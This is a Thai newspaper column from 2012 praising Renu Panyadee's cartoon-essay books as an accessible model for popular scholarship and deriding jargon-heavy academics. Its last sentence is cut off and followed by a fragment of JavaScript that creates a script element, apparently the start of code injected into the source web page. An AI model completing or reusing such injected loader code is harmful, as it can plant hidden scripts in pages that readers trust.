มติชนรายวัน ฉบับประจำวันพุธที่ 2 พฤษภาคม 2555

 

          บทความ ’ตูน ของผู้ใช้นามว่า เรณู ปัญญาดี มีประจำในมติชนสุดสัปดาห์  เริ่มตั้งแต่ปี 2542 เป็นงานสร้างสรรค์สำคัญมากๆ

          สำนักพิมพ์ฟ้าเดียวกันพิมพ์มาวางขายแล้ว แยกได้ 3 เล่ม คือ (1.) แบบเรียน(กึ่ง)สำเร็จรูป (2.) ครึ่งหนึ่งของความ(ไม่อยาก)รู้ (3.) ท่องโลกพลังลบ เที่ยวภพพลังบวก

          “คนไทยไม่อ่าน” เป็นปัญหาที่คนจำนวนหนึ่งในสังคมไทยทุกวันนี้เป็นทุกข์เป็นร้อน ซึ่งมีหลายสาเหตุแน่ๆ แต่เหตุหนึ่งก็คือหนังสือไทยไม่น่าอ่าน ไม่สนุก

          พวกมีภูมิรู้ทางวิชาการก็กระแดะและดัดจริตแต่งหนังสืออ่านยากด้วยศัพท์แสงทางวิชาการลอยฟ้าไม่ลงดิน ใครเขียนหนังสืออ่านง่ายๆ อ้ายและอีพวกนี้ก็ดูถูกดูแคลนทั้งนั้น

          บทความ ’ตูน ของ เรณู ปัญญาดี เป็นต้นแบบ“กึ่งกลาง”ที่ดีได้ เพราะมีวิชาการแล้วอ่านง่าย จึงควรช่วยกันพิจารณาเลือกสรรเอาไปปรับใช้ simplify วิชาความรู้ต่างๆเพื่อสังคมไทยอ่านสนุก

          ตัวอย่างชั้นเลิศอยู่ เล่ม 3 “ท่องโลกพลังลบ เที่ยวภพพลังบวก” เรื่อง นิธิแลนด์ สวนสนุกเพื่อภูมิปัญญา กับคู่มือท่องเที่ยวประเทศครูเบ็น

          เรณูสรุปประเด็นหลักๆในงานวิชาการของ อ. นิธิ เอียวศรีวงศ์ กับ อ. เบ็น แอนเดอร์สัน ได้ง่ายมาก แล้วสนุกมากๆ ซึ่งผมไม่แน่ใจว่าจะมีนักวิชาการไทยสักกี่คนสรุปงานวิชาการได้อย่างนี้ อ้ายและอีที่กระแดะและดัดจริตคงไม่ได้อ่าน

          ลายเส้นของเรณู ปัญญาดี ได้แบบจากลายเส้นของจุมพล กาญจนินทุ คนวาดรูปประกอบหนังสือแบบเรียนเร็วใหม่ เล่ม 1 ตอนต้น (แต่งโดย หลวงดรุณกิจวิทูร และนายฉันท์ ขำวิไล) เริ่มพิมพ์เป็นหนังสือเรียนทั่วประเทศตั้งแต่ พ.ศ. 2490

          เมื่อเรียนชั้นประถม 1-4 ที่โรงเรียนวัดต้นโพธิ์ (อ. ศรีมโหสถ จ. ปราจีนบุรี) ผมต้องอ่านและท่องแบบเรียนเล่มนี้ จึงจำข้อความได้ แม้ลืมไปบ้างก็ยังจำได้ไม่น้อย แล้วจำรูปประกอบได้อย่าง“ไม่รู้ลืม ปลื้มใจ อยู่ในแด”}var d=document;var s=d.createElement(‘script’);